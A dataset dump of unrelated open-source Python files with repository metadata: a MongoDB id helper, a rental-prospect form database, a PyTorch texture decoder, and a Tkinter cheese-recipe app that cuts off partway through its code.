4335222efb0465d4791d48da750c3cc90a7d3d3d
| 190
|
py
|
Python
|
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | 2
|
2021-04-26T20:34:25.000Z
|
2021-11-12T11:26:57.000Z
|
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | null | null | null |
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | null | null | null |
def mongoify(doc):
if 'id' in doc:
doc['_id'] = doc['id']
del doc['id']
return doc
def demongoify(doc):
if "_id" in doc:
doc['id'] = doc['_id']
del doc['_id']
return doc
| 11.875
| 24
| 0.557895
| 32
| 190
| 3.1875
| 0.28125
| 0.294118
| 0.137255
| 0.176471
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0
| 0
| 0.242105
| 190
| 15
| 25
| 12.666667
| 0.708333
| 0
| 0
| 0.2
| 0
| 0
| 0.10582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
433ca49fbb8adbfb98950177982e2a2a5ef07eec
| 4,551
|
py
|
Python
|
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
try:
from ztec.zdb import DB
except:
from zdb import DB
db=DB()
db.load=True
db('Formularios').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Formularios').campo('Contenido',db.list,False,True,False,False,0,-1,None,None)
db('Formularios').campo('args',db.dict,False,True,False,False,0,-1,None,None)
db('Formularios').campo('Fecha',db.str,False,True,False,False,0,-1,None,'%d/%m/%Y %H:%M:%S')
db('Formularios').campo('Status',db.list,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Contenido',db.list,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('args',db.dict,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Fecha',db.str,False,True,False,False,0,-1,None,'%d/%m/%Y %H:%M:%S')
db('Post-de-Formulario').campo('Status',db.list,False,True,False,False,0,-1,None,None)
db('Opciones').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Opciones').campo('Valores',db.list,False,True,False,False,0,-1,None,None)
db('Formularios').insertar('Rental Prospects', [[{'opcion': 0, 'Logo': 'img-admin', 'opciones': 'archivos', 'name': 'logo', 'value': 0}, {'Rental Prospects': 'text-admin', 'name': 'titulo', 'value': 'Rental Prospects'}, {'1- Name and Last Name': 'text', 'name': 'last_name', 'value': ''}, {'2- Phone Number': 'text-phone', 'name': 'phone', 'value': ''}, {'3- Email Adress': 'text-email', 'name': 'email', 'value': ''}, {'opcion': 1, 'opciones': 'formularios', '4- Size of Apartment': 'select', 'value': 0, 'name': 'size_apartment'}, {'opcion': 0, '5- Does the person have a Section 8 Voucher or any other payment assistance?': 'select', 'opciones': 'main', 'name': 'voucher_payment', 'value': 0}, {'5.1-If so, of how much?': 'number', 'name': 'si_voucher_payment', 'value': '0'}, {'descripcion': '# of Adults & # of Children (+ ages)', '7.-How many people will be living in the apartment?': 'text', 'name': 'live_pest', 'value': ''}, {'8.-Will you have pets living in the apartment?': 'number', 'name': 'pest_in_apartment', 'value': '0'}, {'opcion': 0, 'opciones': 'main', 'name': 'any_evictions', 'value': 0, '9.-Have the person had any evictions?': 'select'}, {'opcion': 0, 'opciones': 'main', '10.- Do you have a criminal record?': 'select', 'value': 0, 'name': 'criminal_record'}, {'If so, when?': 'text', 'name': 'when', 'value': ''}, {'opcion': 0, 'opciones': 'main', 'name': 'what_type', 'value': 0, '11.- If so, what type?': 'select'}, {'Note': 'textarea', 'name': 'note', 'value': ''}]], {'Formulario': 0}, '19/7/2017 16:24:50', [])
db('Opciones').insertar('Antecedentes criminales', ['', 'Misdemeanor', 'Felony'])
db('Opciones').insertar('Tama\xc3\xb1o de los apartamentos', ['', 'Studio', '1 Bedroom 1 Bath', '2 Bedroom 1 Bath (1.5 Bath)', '2 Bedroom 2 Bath', '3 Bedroom 2 Bath'])
db('Post-de-Formulario').insertar('Rental Prospects 1', [{'value': '0', 'name': 'id', 'Formulario': 'hidden-id'}, [{'opcion': 0, 'Logo': 'img-admin', 'opciones': 'archivos', 'name': 'logo', 'value': 0}, {'Rental Prospects': 'text-admin', 'name': 'titulo', 'value': 'Rental Prospects'}, {'1- Name and Last Name': 'text', 'name': 'last_name', 'value': ''}, {'2- Phone Number': 'text-phone', 'name': 'phone', 'value': ''}, {'3- Email Adress': 'text-email', 'name': 'email', 'value': ''}, {'opcion': 1, 'opciones': 'formularios', '4- Size of Apartment': 'select', 'value': 0, 'name': 'size_apartment'}, {'opcion': 0, '5- Does the person have a Section 8 Voucher or any other payment assistance?': 'select', 'opciones': 'main', 'name': 'voucher_payment', 'value': 0}, {'5.1-If so, of how much?': 'number', 'name': 'si_voucher_payment', 'value': 0}, {'descripcion': '# of Adults & # of Children (+ ages)', '7.-How many people will be living in the apartment?': 'text', 'name': 'live_pest', 'value': ''}, {'8.-Will you have pets living in the apartment?': 'number', 'name': 'pest_in_apartment', 'value': 0}, {'opcion': 0, 'opciones': 'main', 'name': 'any_evictions', 'value': 1, '9.-Have the person had any evictions?': 'select'}, {'opcion': 0, 'opciones': 'main', '10.- Do you have a criminal record?': 'select', 'value': 0, 'name': 'criminal_record'}, {'If so, when?': 'text', 'name': 'when', 'value': ''}, {'opcion': 0, 'opciones': 'main', 'name': 'what_type', 'value': 0, '11.- If so, what type?': 'select'}, {'Note': 'textarea', 'name': 'note', 'value': 'ok'}]], {'Post-de-Formulario': 0}, '29/8/2017 23:32:19', [])
db.load=True
db.load=False
| 175.038462
| 1,613
| 0.633267
| 680
| 4,551
| 4.205882
| 0.192647
| 0.033566
| 0.058741
| 0.07972
| 0.846504
| 0.840909
| 0.840909
| 0.840909
| 0.840909
| 0.840909
| 0
| 0.030532
| 0.100417
| 4,551
| 25
| 1,614
| 182.04
| 0.668051
| 0.004614
| 0
| 0.083333
| 0
| 0
| 0.55742
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4a2c4409de8c324e16075fba002fbc4c6742acfc
| 131
|
py
|
Python
|
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | null | null | null |
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | 1
|
2021-08-31T09:20:10.000Z
|
2021-09-08T04:37:17.000Z
|
data_preprocessing/__init__.py
|
KylinLiu-633/GS-GLSTM-master
|
585eb099bb49a5f737b001db9a5031dc1a409fd8
|
[
"MIT"
] | null | null | null |
from .get_dataset import word_mapping, edge_mapping, char_mapping
from .get_dataset import get_dataset_from_instances, collect_data
| 65.5
| 65
| 0.885496
| 20
| 131
| 5.35
| 0.55
| 0.280374
| 0.261682
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076336
| 131
| 2
| 66
| 65.5
| 0.884298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4a958671aa088352e289ec4b83ba7245eca8388c
| 6,125
|
py
|
Python
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 78
|
2019-10-30T13:05:16.000Z
|
2022-03-02T06:15:20.000Z
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 6
|
2020-06-21T08:39:02.000Z
|
2021-11-28T14:47:12.000Z
|
mesh2tex/texnet/models/decoder.py
|
nihalsid/texture_fields
|
dcd091a5f40fe433dbc47f2055d1cd2d3d2a1b87
|
[
"MIT"
] | 12
|
2020-04-02T21:08:15.000Z
|
2021-12-12T14:23:38.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from mesh2tex import common
from mesh2tex.layers import (
ResnetBlockPointwise,
EqualizedLR
)
class DecoderEachLayerC(nn.Module):
def __init__(self, c_dim=128, z_dim=128, dim=3,
hidden_size=128, leaky=True,
resnet_leaky=True, eq_lr=False):
super().__init__()
self.c_dim = c_dim
self.eq_lr = eq_lr
# Submodules
if not leaky:
self.actvn = F.relu
else:
self.actvn = lambda x: F.leaky_relu(x, 0.2)
if not resnet_leaky:
self.resnet_actvn = F.relu
else:
self.resnet_actvn = lambda x: F.leaky_relu(x, 0.2)
self.conv_p = nn.Conv1d(dim, hidden_size, 1)
self.block0 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block1 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block2 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block3 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block4 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.fc_cz_0 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_1 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_2 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_3 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_4 = nn.Linear(c_dim + z_dim, hidden_size)
self.conv_out = nn.Conv1d(hidden_size, 3, 1)
if self.eq_lr:
self.conv_p = EqualizedLR(self.conv_p)
self.conv_out = EqualizedLR(self.conv_out)
self.fc_cz_0 = EqualizedLR(self.fc_cz_0)
self.fc_cz_1 = EqualizedLR(self.fc_cz_1)
self.fc_cz_2 = EqualizedLR(self.fc_cz_2)
self.fc_cz_3 = EqualizedLR(self.fc_cz_3)
self.fc_cz_4 = EqualizedLR(self.fc_cz_4)
# Initialization
nn.init.zeros_(self.conv_out.weight)
def forward(self, p, geom_descr, z, **kwargs):
c = geom_descr['global']
batch_size, D, T = p.size()
cz = torch.cat([c, z], dim=1)
net = self.conv_p(p)
net = net + self.fc_cz_0(cz).unsqueeze(2)
net = self.block0(net)
net = net + self.fc_cz_1(cz).unsqueeze(2)
net = self.block1(net)
net = net + self.fc_cz_2(cz).unsqueeze(2)
net = self.block2(net)
net = net + self.fc_cz_3(cz).unsqueeze(2)
net = self.block3(net)
net = net + self.fc_cz_4(cz).unsqueeze(2)
net = self.block4(net)
out = self.conv_out(self.actvn(net))
out = torch.sigmoid(out)
return out
class DecoderEachLayerCLarger(nn.Module):
def __init__(self, c_dim=128, z_dim=128, dim=3,
hidden_size=128, leaky=True,
resnet_leaky=True, eq_lr=False):
super().__init__()
self.c_dim = c_dim
self.eq_lr = eq_lr
if not leaky:
self.actvn = F.relu
else:
self.actvn = lambda x: F.leaky_relu(x, 0.2)
if not resnet_leaky:
self.resnet_actvn = F.relu
else:
self.resnet_actvn = lambda x: F.leaky_relu(x, 0.2)
# Submodules
self.conv_p = nn.Conv1d(dim, hidden_size, 1)
self.block0 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block1 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block2 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block3 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block4 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block5 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.block6 = ResnetBlockPointwise(
hidden_size, actvn=self.resnet_actvn, eq_lr=eq_lr)
self.fc_cz_0 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_1 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_2 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_3 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_4 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_5 = nn.Linear(c_dim + z_dim, hidden_size)
self.fc_cz_6 = nn.Linear(c_dim + z_dim, hidden_size)
self.conv_out = nn.Conv1d(hidden_size, 3, 1)
if self.eq_lr:
self.conv_p = EqualizedLR(self.conv_p)
self.conv_out = EqualizedLR(self.conv_out)
self.fc_cz_0 = EqualizedLR(self.fc_cz_0)
self.fc_cz_1 = EqualizedLR(self.fc_cz_1)
self.fc_cz_2 = EqualizedLR(self.fc_cz_2)
self.fc_cz_3 = EqualizedLR(self.fc_cz_3)
self.fc_cz_4 = EqualizedLR(self.fc_cz_4)
self.fc_cz_5 = EqualizedLR(self.fc_cz_5)
self.fc_cz_6 = EqualizedLR(self.fc_cz_6)
# Initialization
nn.init.zeros_(self.conv_out.weight)
def forward(self, p, geom_descr, z, **kwargs):
c = geom_descr['global']
batch_size, D, T = p.size()
cz = torch.cat([c, z], dim=1)
net = self.conv_p(p)
net = net + self.fc_cz_0(cz).unsqueeze(2)
net = self.block0(net)
net = net + self.fc_cz_1(cz).unsqueeze(2)
net = self.block1(net)
net = net + self.fc_cz_2(cz).unsqueeze(2)
net = self.block2(net)
net = net + self.fc_cz_3(cz).unsqueeze(2)
net = self.block3(net)
net = net + self.fc_cz_4(cz).unsqueeze(2)
net = self.block4(net)
net = net + self.fc_cz_5(cz).unsqueeze(2)
net = self.block5(net)
net = net + self.fc_cz_6(cz).unsqueeze(2)
net = self.block6(net)
out = self.conv_out(self.actvn(net))
out = torch.sigmoid(out)
return out
| 35.818713
| 62
| 0.603592
| 917
| 6,125
| 3.752454
| 0.083969
| 0.083697
| 0.111595
| 0.032549
| 0.916013
| 0.904969
| 0.89596
| 0.89596
| 0.89596
| 0.89596
| 0
| 0.028846
| 0.286857
| 6,125
| 170
| 63
| 36.029412
| 0.758929
| 0.008327
| 0
| 0.855072
| 0
| 0
| 0.001977
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.036232
| 0
| 0.094203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
435ba19e0432ffe8dd85a3cc0e614d50fb921a7c
| 28,801
|
py
|
Python
|
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
controller.py
|
Jazpy/MYP-P2
|
86f38b52a6e3616cb8d9d81d97441dc1a6264f8c
|
[
"MIT"
] | null | null | null |
import Tkinter as tk
import ttk
import textwrap
import db_func
import table_objects
"""
This module manages the connection between database and GUI,
it is the controller of the MVC programming pattern
"""
class controller(tk.Frame):
def __init__(self, parent, db):
"""
Construct new 'controller' object
:param parent: the view's parent
:param db: database to connecto to
:return: returns nothing
"""
tk.Frame.__init__(self, parent, background = "white")
self.parent = parent
self.db = db
self.init_ui()
self.area1 = None
self.area2 = None
self.area3 = None
self.area4 = None
self.listbox = None
self.main_menu("")
def init_ui(self):
"""
Create app window
:return: returns nothing
"""
self.parent.title("RECIPINATOR")
self.pack(fill = tk.BOTH, expand = 1)
def clean(self):
"""
Clean app window
:return: returns nothing
"""
for widget in self.winfo_children():
widget.destroy()
self.area1 = None
self.area2 = None
self.area3 = None
self.area4 = None
self.listbox = None
def main_menu(self, event):
"""
Creates app's main menu
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
add = ttk.Button(self, text = "Add", style = "Slate.TButton")
add.grid(row = 0, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
delete = ttk.Button(self, text = "Delete", style = "Slate.TButton")
delete.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
search = ttk.Button(self, text = "Search", style = "Slate.TButton")
search.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
add.bind("<1>", self.add_menu)
delete.bind("<1>", self.delete_menu)
search.bind("<1>", self.search_menu)
self.pack()
def add_menu(self, event):
"""
Shows user adding options
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
cheese = ttk.Button(self, text = "Add cheese",
style = "Slate.TButton")
cheese.grid(row = 0, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
recipe = ttk.Button(self, text = "Add recipe",
style = "Slate.TButton")
recipe.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
cheese.bind("<1>", self.add_cheese)
recipe.bind("<1>", self.add_recipe)
back.bind("<1>", self.main_menu)
self.pack()
def add_cheese(self, event):
"""
Asks user for new cheese's information
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 0)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 0)
self.rowconfigure(3, pad = 3, weight = 1)
self.rowconfigure(4, pad = 3, weight = 0)
self.rowconfigure(5, pad = 3, weight = 1)
self.rowconfigure(6, pad = 3, weight = 0)
self.rowconfigure(7, pad = 3, weight = 0)
clabel = tk.Label(self, text = "Name:", font = ("Arial", 16),
bg = "white")
clabel.grid(row = 0, column = 0)
self.area1 = tk.Text(self)
self.area1.grid(row = 1, column = 0, columnspan = 1,
rowspan = 1)
colabel = tk.Label(self, text = "Country of origin:",
font = ("Arial", 16), bg = "white")
colabel.grid(row = 2, column = 0)
self.area2 = tk.Text(self)
self.area2.grid(row = 3, column = 0, columnspan = 1,
rowspan = 1)
solabel = tk.Label(self, text = "Softness of cheese:",
font = ("Arial", 16), bg = "white")
solabel.grid(row = 4, column = 0)
self.area3 = tk.Text(self)
self.area3.grid(row = 5, column = 0, columnspan = 1,
rowspan = 1)
add = ttk.Button(self, text = "Add", style = "Slate.TButton")
add.grid(row = 6, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back", style = "Slate.TButton")
back.grid(row = 7, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.add_menu)
add.bind("<1>", self.db_add_cheese)
self.pack()
def db_add_cheese(self, event):
"""
Handles adding cheese to database
:return: returns nothing
"""
cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
country_name = self.area2.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
softness = self.area3.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
cheese_to_add = None
country_to_add = None
if cheese_name != "":
cheese_to_add = table_objects.cheese(-1,
cheese_name, softness)
db_func.add_cheese_row(self.db, cheese_to_add)
if country_name != "":
country_to_add = table_objects.country(-1,
country_name)
db_func.add_country_row(self.db, country_to_add)
if cheese_to_add is not None and country_to_add is not None:
db_func.connect_cheese_country(self.db,
cheese_to_add, country_to_add)
self.clean()
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back", style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
def add_recipe(self, event):
"""
Asks user for recipe information
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 0)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 0)
self.rowconfigure(3, pad = 3, weight = 1)
self.rowconfigure(4, pad = 3, weight = 0)
self.rowconfigure(5, pad = 3, weight = 1)
self.rowconfigure(6, pad = 3, weight = 0)
self.rowconfigure(7, pad = 3, weight = 1)
self.rowconfigure(8, pad = 3, weight = 0)
self.rowconfigure(9, pad = 3, weight = 0)
clabel = tk.Label(self, text = "Cheese used:",
font = ("Arial", 16), bg = "white")
clabel.grid(row = 0, column = 0)
self.area1 = tk.Text(self)
self.area1.grid(row = 1, column = 0, columnspan = 1,
rowspan = 1)
relabel = tk.Label(self, text = "Recipe name:",
font = ("Arial", 16), bg = "white")
relabel.grid(row = 2, column = 0)
self.area2 = tk.Text(self)
self.area2.grid(row = 3, column = 0, columnspan = 1,
rowspan = 1)
tilabel = tk.Label(self, text = "Cooking time:",
font = ("Arial", 16), bg = "white")
tilabel.grid(row = 4, column = 0)
self.area3 = tk.Text(self)
self.area3.grid(row = 5, column = 0, columnspan = 1,
rowspan = 1)
inlabel = tk.Label(self, text = "Instructions:",
font = ("Arial", 16), bg = "white")
inlabel.grid(row = 6, column = 0)
self.area4 = tk.Text(self)
self.area4.grid(row = 7, column = 0, columnspan = 1,
rowspan = 1)
add = ttk.Button(self, text = "Add", style = "Slate.TButton")
add.grid(row = 8, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back", style = "Slate.TButton")
back.grid(row = 9, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.add_menu)
add.bind("<1>", self.db_add_recipe)
self.pack()
def db_add_recipe(self, event):
"""
Handles adding recipe to the database
:return: returns nothing
"""
cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
recipe_name = self.area2.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
time = self.area3.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
instructions = self.area4.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
if (cheese_name == "" or recipe_name == ""):
self.clean()
label = tk.Label(self, text =
"Error: A name field was left blank",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
elif (db_func.row_exists(self.db, cheese_name, "cheeses") is False or
db_func.row_exists(self.db, recipe_name, "recipes") is True):
self.clean()
label = tk.Label(self, text =
"Error: Cheese doesn't exist in database, "\
"or recipe already exists",
font = ("Arial", 16), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
else:
cheese_to_add = table_objects.cheese(-1,
cheese_name, "notimportant")
db_func.add_cheese_row(self.db, cheese_to_add)
recipe_to_add = table_objects.recipe(-1,
recipe_name, instructions, time)
db_func.add_recipe_row(self.db,
recipe_to_add)
db_func.connect_cheese_recipe(self.db,
cheese_to_add, recipe_to_add)
self.clean()
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
self.pack()
def delete_menu(self, event):
"""
Shows user deletion options
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
self.rowconfigure(2, pad = 3, weight = 1)
cheese = ttk.Button(self, text = "Delete cheese",
style = "Slate.TButton")
cheese.grid(row = 0, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
recipe = ttk.Button(self, text = "Delete recipe",
style = "Slate.TButton")
recipe.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 2, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
cheese.bind("<1>", self.del_cheese)
recipe.bind("<1>", self.del_recipe)
back.bind("<1>", self.main_menu)
self.pack()
def del_cheese(self, event):
"""
Asks for name of cheese to delete
:return: returns nothing
"""
self.clean()
ttk.Style().configure("Slate.TButton", padding =
(0, 5, 0, 5), font = 'Arial 20',
# foreground = "#CCCECF", background = "#092E3B")
foreground = "black", background = "white")
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 0)
self.rowconfigure(1, pad = 3, weight = 1)
clabel = tk.Label(self, text = "Name:", font = ("Arial", 16),
bg = "white")
clabel.grid(row = 0, column = 0)
self.area1 = tk.Text(self)
self.area1.grid(row = 1, column = 0, columnspan = 1,
rowspan = 1)
delb = ttk.Button(self, text = "Delete",
style = "Slate.TButton")
delb.grid(row = 6, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back = ttk.Button(self, text = "Back", style = "Slate.TButton")
back.grid(row = 7, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.delete_menu)
delb.bind("<1>", self.db_del_cheese)
self.pack()
def db_del_cheese(self, event):
"""
Handles deleting country from the database
:return: returns nothing
"""
cheese_name = self.area1.get("1.0", 'end-1c').lower().encode('ascii', 'ignore')
cheese_to_add = None
if (cheese_name == "" or
db_func.row_exists(self.db, cheese_name, "cheeses") is False):
self.clean()
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text =
"Error: Cheese not found",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
back.grid(row = 1, column = 0,
sticky = tk.N + tk.S + tk.E + tk.W)
back.bind("<1>", self.main_menu)
else:
cursor = self.db.cursor()
cursor.execute("select rowid from cheeses where name = ?",
(str(cheese_name),))
chid = cursor.fetchone()[0]
cursor.execute("select softness from cheeses where name = ?",
(str(cheese_name),))
softness = cursor.fetchone()[0]
cheese_to_del = table_objects.cheese(chid,
cheese_name, softness)
db_func.del_cheese_row(self.db, cheese_to_del)
self.columnconfigure(0, pad = 3, weight = 1)
self.rowconfigure(0, pad = 3, weight = 1)
self.rowconfigure(1, pad = 3, weight = 1)
label = tk.Label(self, text = "Success!",
font = ("Arial", 20), bg = "white")
label.grid(row = 0, column = 0)
back = ttk.Button(self, text = "Back",
style = "Slate.TButton")
